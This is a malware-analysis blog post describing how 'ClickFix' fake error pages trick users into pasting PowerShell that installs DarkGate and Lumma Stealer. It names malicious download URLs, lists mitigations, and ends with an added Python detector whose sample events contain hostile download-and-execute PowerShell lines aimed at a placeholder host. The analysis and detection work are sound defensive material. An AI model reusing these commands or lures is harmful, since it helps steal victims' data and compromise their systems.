ClickFix Deception: A Social Engineering Tactic to Deploy Malware

Authored by Yashvi Shah and Vignesh Dhatchanamoorthy

McAfee Labs has discovered a highly unusual method of malware delivery, referred to by researchers as the “Clickfix” infection chain. The attack chain begins with users being lured to visit seemingly legitimate but compromised websites. Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The “ClickFix” infection chain represents a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. These compromised websites are often carefully crafted to look genuine, increasing the likelihood of user compliance. Once the script is pasted and executed in the PowerShell terminal, it allows the malware to infiltrate the victim’s system, potentially leading to data theft, system compromise, or further propagation of the malware.

We have observed malware families such as Lumma Stealer and DarkGate leveraging this technique. Here is the heatmap showing the distribution of users affected by the “Clickfix” technique:

Figure 1: Prevalence for the last three months

Darkgate ingestion via “ClickFix”

DarkGate is a sophisticated malware known for its ability to steal sensitive information, provide remote access, and establish persistent backdoors in compromised systems. It employs advanced evasion tactics and can spread within networks, making it a significant cybersecurity threat.
McAfee Labs obtained a phishing email from the spamtrap with an HTML attachment.

Figure 2: Email with Attachment

The HTML file masquerades as a Word document, displaying an error prompt to deceive users. This tactic is used to trick users into taking actions that could lead to the download and execution of malicious software.

Figure 3: Displays the extension problem issue

As shown, the sample displays a message stating, “The ‘Word Online’ extension is NOT installed in your browser. To view the document offline, click the ‘How to fix’ button.”

Before clicking on this button, let’s examine the underlying code. Upon inspecting the code, it was discovered that there were several base64-encoded content blocks present. Of particular significance was one found within the title tag, which played a crucial role in this scenario.

Figure 4: HTML contains Base64-encoded content in the title tag

Decoding this we get,

Figure 5: After decoding the code

The decoded command calls for PowerShell to carry out malicious actions on a system. It begins by downloading an HTA (HTML Application) file from the URL https://www.rockcreekdds.com/wp-content/1[.]hta and saves it locally as C:\users\public\Ix.hta.

The script then executes this HTA file using the start-process command, which initiates harmful actions on the system. Additionally, the script includes a command (Set-Clipboard -Value ' ') to clear the contents of the clipboard. After completing its tasks, the script terminates the PowerShell session with exit.

Upon further inspection of the HTML page, we found a JavaScript at the end of the code.

Figure 6: Decoding function snippet

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes instructions to download and execute an HTA file from a remote server.

Let’s delve into it practically:

Figure 7: Clipboard contains malicious command

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard) suggests a social engineering tactic to further convince the user to execute the PowerShell script. This sequence of actions is intended to initiate the downloaded script (likely stored in the clipboard) without the user fully understanding its potentially malicious nature.

Once the user does this, the HTA file gets downloaded.

Figure 8: HTA code snippet

The above file attempts to connect to the marked domain and execute a PowerShell file from this malicious source. Given below is the malicious script that is stored remotely and executed.

Figure 9: PowerShell code snippet

As this PowerShell script is executed implicitly without any user interaction, a folder is created in the C drive where an AutoIt executable and script are dropped and executed automatically.

Figure 10: Downloaded zip contains AutoIT script

Following this, DarkGate begins its malicious activity and starts communicating with its command and control (C2) server.

A similar Clickfix social engineering technique was found to be dropping Lumma Stealer.

Lumma Stealer ingestion via “ClickFix”

McAfee Labs discovered a website displaying an error message indicating that the browser is encountering issues displaying the webpage. The site provides steps to fix the problem, which are designed to deceive users into executing malicious actions.

Figure 11: Displaying error on accessing the webpage

It directs the target user to perform the following steps:

1. Click on the “Copy Fix” button.
2. Right-click on the Windows icon.
3. Open Windows PowerShell (Admin).
4. Right-click within the open terminal window.
5. Wait for the update to complete.

Let’s analyze the code that gets copied when clicking the “Copy Fix” button.

Figure 12: Base64-encoded content

As we can see, the code includes base64-encoded content. Decoding this content, we get the following script:

Figure 13: After decoding the Base64 content

This PowerShell script flushes the DNS cache and then decodes a base64-encoded command to fetch and execute a script from the remote URL https://weoleycastletaxis.co.uk/chao/child/cow[.]html, masquerading the request with a specific User-Agent header. The fetched script is then executed, and the screen is cleared to hide the actions. Subsequently, it decodes another base64 string to execute a command that sets the clipboard content to a space character. The script is likely designed for malicious purposes, such as downloading and executing remote code covertly while attempting to hide its activity from the user.

Upon execution, the following process tree flashes:

Figure 14: Process Tree

Since it is downloading the malware from the given URL, a new folder is created in a Temp folder and a zip is downloaded:

Figure 15: Network activity

The malware is unzipped and dropped in the same folder:

Figure 16: Dropped files

The malware starts communicating with its C2 server as soon as it gets dropped in the targeted system.

Conclusion:

In conclusion, the Clickfix social engineering technique showcases a highly effective and technical method for malware deployment. By embedding base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands. These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer.

Once the malware is active on the system, it begins its malicious activities, including stealing users’ personal data and sending it to its command and control (C2) server. The script execution often includes steps to evade detection and maintain persistence, such as clearing clipboard contents and running processes in minimized windows. By disguising error messages and providing seemingly helpful instructions, attackers manipulate users into unknowingly executing harmful scripts that download and run various types of malware.

Mitigations:

At McAfee Labs, we are committed to helping organizations protect themselves against sophisticated cyber threats, such as the Clickfix social engineering technique. Here are our recommended mitigations and remediations:

1. Conduct regular training sessions to educate users about social engineering tactics and phishing schemes.
2. Install and maintain updated antivirus and anti-malware software on all endpoints.
3. Implement robust email filtering to block phishing emails and malicious attachments.
4. Use web filtering solutions to prevent access to known malicious websites.
5. Deploy firewalls and intrusion detection/prevention systems (IDS/IPS) to monitor and block malicious network traffic.
6. Use network segmentation to limit the spread of malware within the organization.
7. Implement the principle of least privilege (PoLP) to minimize user access to only necessary resources.
8. Implement security policies to monitor and restrict clipboard usage, especially in sensitive environments.
9. Implement multi-factor authentication (MFA) for accessing sensitive systems and data.
10. Ensure all operating systems, software, and applications are kept up to date with the latest security patches.
11. Continuously monitor and analyze system and network logs for indicators of compromise.
12. Encrypt sensitive data both in transit and at rest to protect it from unauthorized access.
13. Regularly back up critical data and store backups securely to ensure data recovery in case of a ransomware attack or data breach.
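In support of the clipboard-monitoring and log-analysis mitigations, here is an added Python example (not part of the McAfee write-up) that scores Windows process-creation events against the behaviours analysed above: PowerShell launched from explorer.exe (where a Windows+R paste lands), a base64 -EncodedCommand, an HTA download and Start-Process, Set-Clipboard clearing, and the DNS flush. The event field names, the constructed sample telemetry with placeholder URLs and paths, and the scoring threshold are all assumptions.

```python
# Added example, not McAfee's code: heuristic ClickFix detection over process-creation
# events (Sysmon ID 1 / EDR style). Field names and the threshold are assumptions.
import base64
import re

# Behaviours the analysis describes, matched against the (decoded) command line.
INDICATORS = {
    "hta_download": re.compile(r"\.hta\b|\bmshta\b", re.I),
    "clipboard_clear": re.compile(r"Set-Clipboard", re.I),
    "dns_flush": re.compile(r"flushdns|Clear-DnsClientCache", re.I),
    "b64_decode": re.compile(r"FromBase64String", re.I),
    "remote_fetch": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\birm\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)  # -EncodedCommand and abbreviations

def decode_encoded_command(cmdline):
    """Append the decoded -EncodedCommand payload (base64 over UTF-16LE) so it can be inspected."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline  # malformed payload: score the raw command line instead

def score_event(event):
    """Return (score, hits) for one event; anything but PowerShell scores 0."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, []
    cmd = decode_encoded_command(event["command_line"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # The paste goes into the Run dialog or a fresh console, so the parent is explorer.exe.
    if event["parent_image"].lower().endswith("explorer.exe"):
        hits.append("explorer_parent")
    if ENCODED_FLAG.search(event["command_line"]):
        hits.append("encoded_command")
    return len(hits), hits

def find_clickfix(events, threshold=3):
    """Return [(pid, hits)] for events whose indicator count reaches the threshold."""
    scored = ((e["pid"], score_event(e)) for e in events)
    return [(pid, hits) for pid, (score, hits) in scored if score >= threshold]

def _enc(script):  # what -EncodedCommand expects: base64 over UTF-16LE
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample telemetry, not real IoCs; URLs and paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"pid": 101, "parent_image": r"C:\Windows\explorer.exe", "image": PS,  # DarkGate-style paste
     "command_line": "powershell -w hidden -c \"iwr hxxp://example.invalid/1.hta -OutFile "
                     "C:\\users\\public\\x.hta; Start-Process C:\\users\\public\\x.hta; Set-Clipboard -Value ' '; exit\""},
    {"pid": 102, "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,  # routine admin job
     "command_line": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"pid": 103, "parent_image": r"C:\Windows\explorer.exe", "image": PS,  # Lumma-style paste
     "command_line": "powershell -e " + _enc("ipconfig /flushdns; iex ([Text.Encoding]::UTF8.GetString("
                                             "[Convert]::FromBase64String('QQ=='))); cls; Set-Clipboard -Value ' '")},
]
```

Running find_clickfix(SAMPLE_EVENTS) flags pids 101 and 103 with five indicators each, while the scheduled admin script scores zero; tune the threshold against your own baseline before alerting on it.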